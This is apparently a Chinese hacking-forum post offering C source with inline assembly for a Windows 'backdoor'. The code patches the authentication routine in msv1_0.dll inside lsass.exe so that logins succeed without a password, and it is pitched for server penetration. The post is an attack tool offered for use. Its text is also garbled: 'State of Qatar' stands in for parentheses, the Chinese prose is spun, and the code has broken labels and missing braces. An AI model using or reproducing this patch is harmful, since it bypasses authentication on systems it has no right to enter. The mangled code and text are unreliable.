定义控制台应用程序的入口点

c语言windows后门

在WINDOWS服务器渗透的时候或然用的着,也能够让xx界里的爱人学点东西
效果与利益在帐户有组计谋限定的时候,不可能增添管理员账号的时候,
能够毫无密码登入。
测量试验在XP,2004,二〇〇三上过。运营后无需用密码。模仿GOLDSUN的十三分写的。
// get.cpp : 定义调整台应用程序的入口点。
//
#include “stdio.h”
#include <windows.h>
#include <TLHELP32.H>

BOOL EnablePriv(State of Qatar//提高进度权限
{
HANDLE hToken;
if (
OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken)
)
{
       TOKEN_PRIVILEGES tkp;
     
       LookupPrivilegeValue(
NULL,SE_DEBUG_NAME,&tkp.Privileges[0].Luid 卡塔尔国; //改正进程权限
       tkp.PrivilegeCount=1;
       tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
       AdjustTokenPrivileges( hToken,FALSE,&tkp,sizeof tkp,NULL,NULL State of Qatar;
//通告系统更正进度权限

return( (GetLastError()==ERROR_SUCCESS) );
}
return TRUE;

DWORD getpid()
{
HANDLE toolhelp;
toolhelp = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
PROCESSENTRY32 pe32;
pe32.dwSize=sizeof(PROCESSENTRY32);
BOOL bRet = Process32First(toolhelp,&pe32);
while(bRet)
{
if (0 == strcmp(CharLower(pe32.szExeFile),”lsass.exe”)) return
pe32.th32ProcessID;

bRet = Process32Next(toolhelp,&pe32);
}

CloseHandle(toolhelp);

}

int main(void)
{
HMODULE hmodule;
DWORD temp,pid;
HANDLE process;
char buffer[2];
DWORD writbyte;
EnablePriv();
hmodule = LoadLibrary(“msv1_0.dll”);
__asm{
pushad
mov eax,hmodule
bijiao: cmp byte PTR [eax],8bh
jnz sarchnext
cmp byte PTR [eax+1],4dh
jnz sarchnext
cmp byte PTR [eax+2],0ch
jnz sarchnext
cmp byte PTR [eax +3],49h
jz finds

sarchnext:inc eax
jmp night
finds :
mov temp,eax
popad
}
__asm{
pushad
mov eax,temp
sear: cmp byte PTR [eax],32h
jnz searnext
cmp byte PTR [eax+1],11000000b
jnz searnext
jz findss
searnext: inc eax
jmp sear
findss: mov temp,eax
popad
}
// memset((LPVOID)temp,0xb0,1);
// memset((LPVOID)(temp+1),0x01,1);

pid = getpid();
process = OpenProcess(PROCESS_ALL_ACCESS,false,pid);
memset(buffer,0xb0,1);
memset((LPVOID)(buffer+1),0x01,1);
WriteProcessMemory(process,(LPVOID)temp,buffer,sizeof(buffer),&writbyte);
writbyte =GetLastError();
printf(“%d”,writbyte);
//MessageBox(NULL,”find ok”,”title”,MB_OK);
// FreeLibrary(hmodule);
return 0;

}